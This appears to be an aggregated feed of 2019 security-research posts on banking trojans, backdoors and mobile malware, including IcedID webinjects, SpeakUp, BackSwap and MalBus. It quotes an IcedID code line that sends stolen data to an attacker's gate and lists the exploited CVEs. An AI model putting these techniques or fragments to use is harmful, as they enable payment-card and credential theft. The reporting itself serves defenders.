The following snippet shows the creation of a document object model (DOM) script element with type Text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from the home_link of the ssid= of the infected user’s device, along with the current calendar date.

IBM X-Force Research

Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.

IBM X-Force Research

Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in parsed form that allows the criminal to view and search data via the control panel.

IBM X-Force Research

Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and his or her activity. The content grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time and manages the attack’s variables.

IBM X-Force Research

Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:

IBM X-Force Research

Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots by a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

Function name

Purpose

isFrame()

Checks for frames on the website to look for potential third-party security controls.

isValidCardNumber(a)

Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.

onLoaded()

The main function that sets off the data grabbing process.

addLog(a,b,c,d)

Adds new logs to the reports section in the attack server.

writeLog()

Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + “&pkey=” + urlEncode(pkey) + “&ssid=” + b, b)

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:

IBM X-Force Research

Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP Address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:

IBM X-Force Research

Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel helps facilitate bot control, data management and management of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called the Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

While some Trojan gangs choose to expand their attack turf into more countries, this requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, it does not appear the gang is looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America by targeting banks and e-commerce businesses in that region.

In 2018, IcedID reached the fourth rank on the global financial Trojan chart, having kept up its malicious activity throughout the year.

IBM X-Force Research

Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

Speak Up Malware Targets Linux, Mac in New Campaign

Linux servers are the target of a new crypto-mining campaign in which a malware dubbed “Speak Up” implants a backdoor Trojan by exploiting known vulnerabilities in six different Linux distributions, according

The post Speak Up Malware Targets Linux, Mac in New Campaign appeared first on The Cyber Security Place.

New ExileRAT backdoor used in attacks aimed at users in Tibet

A malware campaign using new LuckyCat-Linked RAT dubbed
ExileRAT has been targeting the mailing list of the organization officially representing the Tibetan government-in-exile.

Security experts at Talos group have uncovered a malware campaign using the ExileRAT backdoor to target the mailing list of the organization officially representing the Tibetan government-in-exile.

Threat actors are delivering the malware via a weaponized Microsoft PowerPoint document, the messages are reaching people in a mailing list run by the Central Tibetan Administration (CTA).

ExileRAT campaign

The nature of malware and the targets suggests the involvement of nationstate actor carrying out a cyber espionage campaign.

Given the nature of the threat and the targets, the campaign was likely designed for espionage purposes, Talos’ security researchers say. 

The bait PowerPoint document is a copy of a legitimate PDF available on CTA’s website, it was sent by attackers to all subscribers to the CTA mailing list,

“Cisco Talos recently observed a malware campaign delivering a malicious Microsoft PowerPoint document using a mailing list run by the Central Tibetan Administration (CTA), an organization officially representing the Tibetan government-in-exile.” reads the analysis published by Talos.

“The document used in the attack was a PPSX file, a file format used to deliver a non-editable slideshow derived from a Microsoft PowerPoint document.”

The experts received an email message from the CTA mailing list containing an attachment, “Tibet-was-never-a-part-of-China.ppsx,” the researchers noticed that the standard Reply-To header used by the CTA mailings was modified to redirect responses to an email address (mediabureauin [at] gmail.com) controlled by the hackers.

The weaponized documents exploit the CVE-2017-0199 flaw, a zero-day
arbitrary code execution vulnerability fixed by Microsoft in April 2017 and that has been actively exploited in attacks in the wild.

The exploit code used by the attackers originated from a public script available on GitHub, researchers noticed that the PPSX also attempts to contact iplocation to perform some geo-location lookups.  

It connects to the command and control (C&C) server to receive a JavaScript script responsible for downloading the final payload. 

The malicious code is executed via WScriptwhile  also utilizing cmd.exe to create a scheduled task called “Diagnostic_System_Host,” the name is
similar to the legitimate system task name “Diagnostic System Host” without the “_” (underscores).

The ExileRAT used in this campaign support commands to retrieve system information (i.e. computer name, username, listing drives, network adapter, and process names), exfiltrate data and and execute or terminate processes.

Talos pointed out that C2 infrastructure has been used in multiple campaigns, including attacks against Tibetan activists leveraging a newer version of the LuckyCat Android RAT.

“This newer version includes the same features as the 2012 version (file uploading, downloading, information stealing and remote shell) and adds several new features, including file removing, app execution, audio recording, personal contact stealing, SMS stealing, recent call stealing and location stealing.” continues the report.

Experts conclude that this new campaign represents an “evolution in a series of attacks targeting a constituency of political supporters, and further evidence that not all attacks require the use of zero-day vulnerabilities,” Talos says. 

The good news is that attackers leveraged an old issue that could be easily detected by up-to-date defense systems. 

Pierluigi Paganini

(SecurityAffairs – hacking, Exilerat)

The post New ExileRAT backdoor used in attacks aimed at users in Tibet appeared first on Security Affairs.

CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS Messages

Researchers have discovered a new malware used to steal saved passwords and credit card details from browsers. In addition, it

CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS Messages on Latest Hacking News.

SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM.

Security experts at Check Point discovered a new backdoor dubbed
SpeakUptargeting Linux servers in East Asia and Latin America.

Malware researchers at Check Point have spotted a new Linux backdoor dubbed ‘SpeakUp’ targeting servers in East Asia and Latin America,

SpeakUp backdoor

The SpeakUp backdoor leverages known vulnerabilities in six different Linux distros, it is also able to infect Mac systems. The Trojan spread by exploiting remote code execution flaw and for the initial infection hackers leverage recently disclosed flaw in ThinkPHP (CVE-2018-20062)

Researchers linked the author of the SpeakUp backdoor with the malware developer that goes online with the moniker of Zettabithf.

Most of the infected machines are in China, the same country where was spotted the sample analyzed by Check Point on January 14, 2019.

“The sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to VirusTotal on January 9 2019. At the time of writing this article, it has no detections in VT.” reads the analysis published by the experts.

Once infected the system, the backdoor connects to the command and control (C&C) server to register the machine, it gains by using cron and an internal mutex, in this way only one instance remains alive at all times.

The backdoor supports the following commands:

  • newtask – to execute arbitrary code, download and execute a file, kill or uninstall a program, and send updated fingerprint data;
  • notask – sleep for 3 seconds and ask for additional command;
  • newerconfig – to update the downloaded miner configuration file.

The backdoor uses a python script to scan and infect other Linux servers within internal and external subnets, it is also able to carry out brute-force admin panels.

The script attempts to exploit the following RCE vulnerabilities in the targeted servers:

  • CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
  • CVE-2010-1871: JBoss Seam Framework remote code execution
  • JBoss AS 3/4/5/6: Remote Command Execution (exploit)
  • CVE-2017-10271: Oracle WebLogic wlswsat Component Deserialization RCE
  • CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
  • Hadoop YARN ResourceManager – Command Execution (exploit)
  • CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

Further researches made by the experts allowed the experts to find liteHTTP GitHub project that has some modules similar to the SpeakUp Trojan.

“SpeakUp`s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy few miners.” Check Point concludes.  

“The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive,”

Pierluigi Paganini

(SecurityAffairs – SpeakUp, backdoor)

The post SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM. appeared first on Security Affairs.

Attack Campaign Targets Linux Servers to Install New SpeakUp Trojan

Security researchers observed an attack campaign that is targeting Linux servers to install samples of SpeakUp, a new backdoor Trojan.

According to Check Point Research, the campaign is currently targeting servers in East Asia and Latin America. The attack begins with the exploitation of CVE-2018-20062, a reported vulnerability affecting ThinkPHP. The campaign then uses command injection techniques to upload a PHP shell, which is responsible for delivering and executing the SpeakUp Trojan as a Perl backdoor.

Upon execution, SpeakUp continuously communicates with its command and control (C&C) server to receive a variety of instructions. It can use the newtask command to execute arbitrary code or execute a file from a remote server, for example. This ability enables SpeakUp to deliver additional backdoors, each of which comes equipped with a Python script designed to scan and infect more Linux servers within its internal and external subnets.

Furthermore, the Trojan can leverage the newconfig command to update the configuration file for XMRig, a cryptocurrency miner that it serves to listening infected servers.

Linux Servers Under Attack

SpeakUp isn’t the only malware targeting Linux servers. On the contrary, these IT assets are under attack from a range of malicious software.

In December 2018, Slovakian security firm ESET identified 21 Linux malware families that serve as OpenSSH backdoors. Around the same time, Anomali Labs unveiled its discovery of Linux Rabbit and Rabbot, two malware families served by a campaign targeting Linux servers in Russia, South Korea, the U.K. and the U.S. that are both capable of installing crypto-miners.

Also in December, Bleeping Computer learned of a new campaign that had leveraged unsecured Intelligent Platform Management Interface (IPMI) cards to infect Linux servers with JungleSec ransomware.

How to Defend Against the SpeakUp Trojan

Security professionals can help defend against malware like SpeakUp by utilizing a unified endpoint management (UEM) tool to monitor assets such as Linux servers for malicious activity. Experts also recommend practicing timely patch management to defend endpoints against cryptocurrency miners, and investing in education and role-based training to help cultivate a security-aware workforce.

The post Attack Campaign Targets Linux Servers to Install New SpeakUp Trojan appeared first on Security Intelligence.

BackSwap and the danger of banking Trojans

BackSwap Banking Trojan

In the survival guide for million-dollar cyberattacks that we published in 2017, we warned how dangerous banking Trojans can be, and highlighted them as one of the key trends in financial cybercrime, along with phishing and keyloggers.  Banking Trojans steal their victim’s online identity and use this information to trick financial institutions and steal money from their accounts. Generally this is done by installing applications or inserting malicious code into the browsers from which users access their bank accounts.

But over the last few years, it seems that the level of banking Trojan activity has decreased considerably. On the one hand, institutions have reacted to the threat by considerably improving their security and their customers’ authentication factors; one example of this is the implementation of virtual keyboards for user sign-in.  This way, it is not possible for a cyberattacker to use a keylogger to steal the details that the user enters with a physical keyboard.

On the other hand, developers have implemented barriers and mechanisms to make injecting code into browsers more complex. For this reason, as we have been pointing out for some time, cyberattackers have been focusing their efforts on other kinds of attacks that are simpler and more profitable, such as ransomware or cryptojacking.

However, in the last few weeks, banking Trojans have started to gain momentum once again, using new, alternative techniques, rather than infiltrating browsers directly. This is the case with BackSwap, a new banking Trojan that has managed to infiltrate several Spanish banks, and which could pose a serious threat to other companies, especially if it comes into contact with employees who work closely with banking institutions. But how does BackSwap work?

BackSwap and its new techniques

BackSwap is an improved and updated variant of the malware Tinba, which was developed in 2015. This malware was noteworthy because of its small size (between 10 and 50Kb) and its capacity to steal the user’s credentials. As ESET researchers discovered, there is one key difference between BackSwap and its predecessor and other banking Trojans, which inject malicious code such as Zbot, Gozi or Dridex. The difference lies in its methodology, which circumvents browsers’ barriers, and can be more difficult for less modern cybersecurity solutions. There are three new techniques that BackSwap uses:

  • It detects when the user is accessing a banking institution online via a mechanism native to Windows called “Message loop”: BackSwap clicks on the Windows message loop to search for patterns similar to a URL, such as “https” chains and other terms related to the name of a bank.
  • Once it detects that the browser is accessing and loading a banking website, BackSwap proceeds to manipulate the loaded content, but does not inject code directly into the browser. Rather, it simulates a user’s keystrokes, and copies the code to the clipboard, then pastes it to the developer’s console. All of this is done in a way that is invisible to the user.
  • Finally, an alternative method – and one that it seems to use more frequently than the previous technique – is to simulate pushing keys in the browser’s address bar: it simulates writing a JavaScript string, pastes the malicious code, and virtually presses enter in order to execute the code. Again, none of this is visible on the user’s screen, and nor does it leave any traces in the history.

How can we prevent it?

As is the case with other banking Trojans such as Trickbot, which we previously analyzed, the main attack vector for BackSwap is email. It is mainly spread via spam containing malicious files such as attached Word documents into which the malware is inserted. Once the file has been executed, it stays on the machine, waiting for the victim to access a banking-related website.

For this reason, the first line of continuous prevention should be employee caution about suspicious emails containing attachments. This is especially true of employees such as CFOs and members of the administration or accounting teams, whose role involves having a close working relationship with financial institutions. It is important to remember that the subject “Invoice” was the cause of 6 out of 10 of the most effective phishing campaigns in 2018.

Likewise, it is a very good idea to have advanced cybersecurity solutions with 360º monitoring, such as Panda Adaptive Defense. On one hand, it performs a complete scan of all emails and attachments in real time as soon as they enter the inbox. On the other hand, it constantly monitors employees’ website use, detecting any suspicious activity in their computers’ browsers. Advanced solutions like Adaptive Defense mean that the negative impact of banking Trojans as complex as BackSwap are reduced to the minimum.

The post BackSwap and the danger of banking Trojans appeared first on Panda Security Mediacenter.

Hackers Now Exploit Google Sheets To Spread CSV Malware

After previously exploiting Microsoft Excel for formula injection attacks, hackers have now turned their attention to Google Sheets for the

Hackers Now Exploit Google Sheets To Spread CSV Malware on Latest Hacking News.

Why vaporworms might be the scourge of 2019

Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be an … More

The post Why vaporworms might be the scourge of 2019 appeared first on Help Net Security.

New cryptocurrency malware SpeakUp hits Linux & Mac devices

By Waqas

The IT security researchers at Check Point have identified a new malware called SpeakUp targeting Linux and macOS – The new findings prove that there has been a surge in malware attacks against Linux and Apple devices. SpeakUp is a new backdoor Trojan that is being distributed by cybercriminals through a malicious new campaign designed […]

This is a post from HackRead.com Read the original post: New cryptocurrency malware SpeakUp hits Linux & Mac devices

Experts found popular beauty apps in the Play Store including malicious code

Researchers at Trend Micro discovered at least 29 malicious photo editing and beauty apps that were able to perform several malicious activities.

Crooks continue to abuse Google Play store to distribute malicious apps, this time experts at Trend Micro discovered at least 29 malicious
photo editing and beauty apps that were stealing users’ photos.

The malicious apps in the Google Play Store have been downloaded more than 4 million times before they were removed.

malicious camera beauty apps

The photo editing and beauty apps were including a code that could perform a broad range of malicious activities.

Experts estimated that 3 of the tainted applications (Pro Camera Beauty, Cartoon Art Photo, Emoji Camera) have been downloaded more than a million times. The Artistic Effect Filter was downloaded over 500,000 times and other seven rogue apps were installed over 100,000 times.

“We discovered several beauty camera apps (detected as AndroidOS_BadCamera.HRX) on Google Play that are capable of accessing remote ad configuration servers that can be used for malicious purposes.” reads the analysis published by Trend Micro.

“Some of these have already been downloaded millions of times, which is unsurprising given the popularity of these kinds of apps.”

When an Android user will download one of the malicious apps he will not immediately sees any suspicious behavior.

Once installed, some of these apps would redirect users to phishing websites others would push full-screen advertisements on the infected device for fraudulent or pornographic content every time the victims will unlock the device.

Some of the beauty apps were including a malicious code that uploads user’s photos to a remote server controlled by the author.

However, instead of displaying an edited photo, the apps display a picture with a fake update prompt in nine different languages.

“However, instead of getting a final result with the edited photo, the user gets a picture with a fake update prompt in nine different languages.” continues the analysis.

“The authors can collect the photos uploaded in the app, and possibly use them for malicious purposes — for example as fake profile pics in social media.”

Some of the beauty apps use packers to prevent them from being analyzed by security firms, they also hide the app icon from the list of installed applications to make it more difficult for users to uninstall them.

TrendMicro reported the list of malicious apps to Google that quickly removed them from the Play Store.

Experts recommend downloading mobile apps only from the official store and that were developed by known and trusted authors. Users can also check reviews for the apps and never install applications for which were reported anomalous behaviors.

Additional info, including Indicators of Compromise (IoCs) are reported in the post published by Trend Micro.

Pierluigi Paganini

(Security Affairs – beauty apps, malware)

The post Experts found popular beauty apps in the Play Store including malicious code appeared first on Security Affairs.

CookieMiner: Steals Passwords From Cookies, Chrome And iPhone Texts!



There’s a new malware CookieMiner, prevalent in the market which binges on saved passwords on Chrome, iPhone text messages and Mac-tethered iTunes backups.

A world-wide cyber-security organization not of very late uncovered a malicious malware which gorges on saved user credentials like passwords and usernames.

This activity has been majorly victimizing passwords saved onto Google Chrome, credit card credentials saved onto Chrome and iPhone text messages backed up to Mac.

Reportedly, what the malware does is that it gets hold of the browser cookies in relation with mainstream crypto-currency exchanges which also include wallet providing websites the user has gone through.

The surmised motive behind the past acts of the miner seems to be the excruciating need to bypass the multi-factor authentication for the sites in question.

Having dodged the main security procedure, the cyber-con behind the attack would be absolutely free to access the victim’s exchange account or the wallet so being used and to exploit the funds in them.

Web cookies are those pieces of information which get automatically stored onto the web server, the moment a user signs in.

Hence, exploitation of those cookies directly means exploiting the very user indirectly.

Cookie theft is the easiest way to dodge login anomaly detection, as if the username and passwords are used by an amateur, the alarms might set off and another authentication request may get sent.

Whereas if the username passwords are used along with the cookie the entire session would absolutely be considered legit and no alert would be issued after all.

Most of the fancy wallet and crypto-currency exchange websites have multi-factor authentication.

All that the CookieMiner does is that it tries to create combinations and try them in order to slide past the authentication process.

A cyber-con could treat such a vulnerable opportunity like a gold mine and could win a lot out of it.

In addition to Google’s Chrome, Apple’s Safari is also a web browser being openly targeted. As it turns out, the choice for the web browser target depends upon its recognition.

The malware seems to have additional malignancy to it as it also finds a way to download a “CoinMiner” onto the affected system/ device.

MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

When the malicious transportation app is installed, it downloads an additional payload from hacked web servers which includes the fake plugin we originally acquired. After the fake plugin is downloaded and installed, it does something completely different – it acts as a plugin of the transportation application and installs a trojan on the device, trying to phish users to input their Google account password and completely take control of the device. What is interesting is that the malware uses the native library to take over the device and also deletes the library to hide from detection. It uses names of popular South Korean services like Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed to only a small group of targets.

The Campaign

The following diagram explains the overall flow from malware distribution to device infection.

Figure 2. Device infection process

When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

Initial Downloader

The following table shows information about the malicious version of each transportation app in the series. As the Google Play number of install stats shows, these apps have been downloaded on many devices.

Unlike the clean version of the app, the malicious version contains a native library named “libAudio3.0.so”.

Figure 3. Transportation app version with malicious native library embedded

In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

Figure 4. Malicious library being loaded and executed in the app

startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as libSound1.1.so) is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

Figure 5 Additional payload download servers

Fake Plugin

The fake plugin is downloaded from a hacked web server with file extension “.mov” to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function implemented in LibMovie.so, which is stored inside the asset folder, drops a malicious trojan to the current running app’s directory masquerading as libpng.2.1.so file. The dropped trojan is originally embedded in the LibMovie.so xor’ed, which is decoded at runtime. After giving permissions, the address of the exported function “Libfunc” in the dropped trojan is dynamically retrieved using dlsym(). The dropped binary in the filesystem is deleted to avoid detection and finally Libfunc is executed.

Figure 6 Toast message when malware is installed

In the other forked process, it tries to access the “naver.property” file on an installed SD Card, if there is one, and if it succeeds, it tries starting “.KaKaoTalk” activity which displays a Google phishing page (more on that in the next section) . The overall flow of the dropper is explained in the following diagram:

Figure 7. Execution flow of the dropper

Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

Phishing in JavaScript

KakaoTalk class opens a local HTML file, javapage.html, with the user’s email address registered on the infected device automatically set to log into their account.

Figure 9. KakaoTalk class loads malicious local html file

The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

Figure 10. The malicious JavaScript shows crafted Google login page with user account

We found the following attempts of exploitation of Google legitimate services by the malware author:

  • Steal victim’s Google account and password
  • Request password recovery for a specific account
  • Set recovery email address when creating new Google account

An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.

Trojan

In addition to the Google phishing page, when “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is totally compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called “doMainProc()”. Please note that there are a few variants of the trojanwith different functionality but, overall, they are pretty much the same.

Figure 12. Hardcoded list of C2 servers

The geolocation of hardcoded C2 servers lookslike the following:

Figure 13. Location of C2 Servers

Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

Figure 14. Subset of command handlers implemented in the dropped trojan.

As you can see, it has all the functionality that a normal trojan has. Downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains supported C2 commands:

Figure 15. C2 Commands

Before entering the command handling loop, the trojan does some initialization, like sending device information files to the server and checking the UID of the device. Only after the UID checking returns a 1 does it enter the loop.

Figure 16 Servers connected before entering command loop

Among these commands, directory indexing in particular is important. The directory structure is saved in a file named “kakao.property” and while indexing the given path in the user device, it checks the file with specific keywords and if it matches, uploads the file to the remote upload server. These keywords are Korean and its translated English version is as per the following table:

Figure 17 Search file keywords

By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

Figure 18 Keyword matching file upload server

Conclusion

Applications can easily trick users into installing them before then leaking sensitive information. Also, it is not uncommon to see malware sneaking onto the official Google Play store, making it hard for users to protect their devices. This malware has not been written for ordinary phishing attempts, but rather very targeted attacks, searching the victim’s devices for files related to the military and politics, likely trying to leak confidential information. Users should always install applications that they can fully trust even though they are downloaded from trusted sources.

McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Hashes (SHA-256)

Initial Downloader (APK)
• 19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270
• bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
• 3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9
• e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801

Fake Plugin (APK)
• ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec
• b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0

Trojan (additional payload)
• b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf
• 12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec
• 91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f
• 20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9

The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware

An analysis of more than 4.4 million malware samples showed botnets were responsible for crypto-mining at least 4.3 percent of Monero over a 12-year period.

These illicit efforts generated an estimated $56 million for cybercriminals behind the campaigns. The study from academics in the U.K. and Spain used a combination of both dynamic and static analysis techniques to pull details from the malware campaigns, including an exploration of the mining pools where payments were made as well as cryptocurrency addresses. Over the 12 years, Monero (XMR) was the most popular cryptocurrency targeted by botnets, the study concluded.

New Crypto-Mining Threat Groups Discovered

While the research paper mentioned previously known malware campaigns such as Smominru and Adylkuzz, the study’s authors also noted some new threat actors. These included Freebuf and USA-138, which used general-purpose botnets rather than renting third-party infrastructure to carry out their mining operations.

Though the latter technique tended to be more successful based on the analyses in the study, the findings are a reminder that cybercriminals are highly capable of using legitimate file management tools and code repositories for illicit purposes.

Since mining pools are known to ban suspicious XMR addresses from time to time, and because mining protocols are subject to change, the researchers concluded that some malware authors often modified their code. Some of these campaigns are still active, while others were relatively brief, according to the paper.

In terms of methodology, the researchers said xmrig, an open-source tool, was most commonly used to build the malware strains that powered crypto-mining bots.

Catching Crypto-Mining Before It Happens

Beyond the money it generates for threat actors, crypto-mining, also known as crypto-jacking, has the secondary adverse impact of draining an organization’s central processing unit (CPU) resources.

IBM X-Force research published last year confirmed that crypto-mining has grown significantly over the past few years and needs to become an active part of IT security monitoring. As it becomes a more persistent threat, utilizing security information and event management (SIEM) tools combined with strong endpoint protection is one of the best ways to ensure your technology infrastructure doesn’t become a place for criminals to harvest Monero.

The post Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware appeared first on Security Intelligence.

A week in security (January 28 – February 3)

Last week, we ran another in our interview with a malware hunter series, explained a FaceTime vulnerability, and took a deep dive into a new stealer. We also threw some light  on a Houzz data breach, and what exactly happened between Apple and Facebook.

Other cybersecurity news

  • Kwik Fit hit by malware: Car service specialist runs into trouble when systems go offline. (Source: BBC)
  • Mozilla publishes tracking policy: Mozilla fleshes out out their vision of what is and isn’t acceptable in tracking land. (Source: Mozilla)
  • Distracting smart speakers: How you can effectively drown out your smart speaker with a bit of distraction. (Source: The Register)
  • Privacy attack aimed at 3/4/5G users: Theoretical fake mobile towers are back in business, with an investment in monitoring device owner activities. (Source: Help Net Security)
  • How my Instagram was hacked: A good warning about the perils of password reuse. (Source: Naked Security)
  • Social media identity thieves: Scammers will stop at nothing to pull some heartstrings and make a little money in the bargain. (Source: ABC news)
  • Another smart home hacked: A family recounts their horror at seeing portions of their home cut open for someone’s amusement. (Source: Komando)
  • Facebook mashup: Plans to combine Whatsapp, Instagram, and Facebook Messenger are revealed with security questions raised. (Source: New York Times)
  • Phishing attacks continue to rise: Worrying stats via security experts polled who agree in large numbers that phishing is at the same level or higher than it was previously. (Source: Mashable)
  • Researchers discover malware-friendly hosting service: After a spike in infections, researchers track things back to a host that looked like a “hornet’s nest of malware.” (Source: TechCrunch)

Stay safe, everyone!

The post A week in security (January 28 – February 3) appeared first on Malwarebytes Labs.

Can AI Become Our New Cybersecurity Sheriff?

Two hospitals in Ohio and West Virginia turned patients away due to a ransomware attack that led to a system failure. The hospitals could not process any emergency patient requests. Hence,

The post Can AI Become Our New Cybersecurity Sheriff? appeared first on The Cyber Security Place.

Several Popular Beauty Camera Apps Caught Stealing Users’ Photos

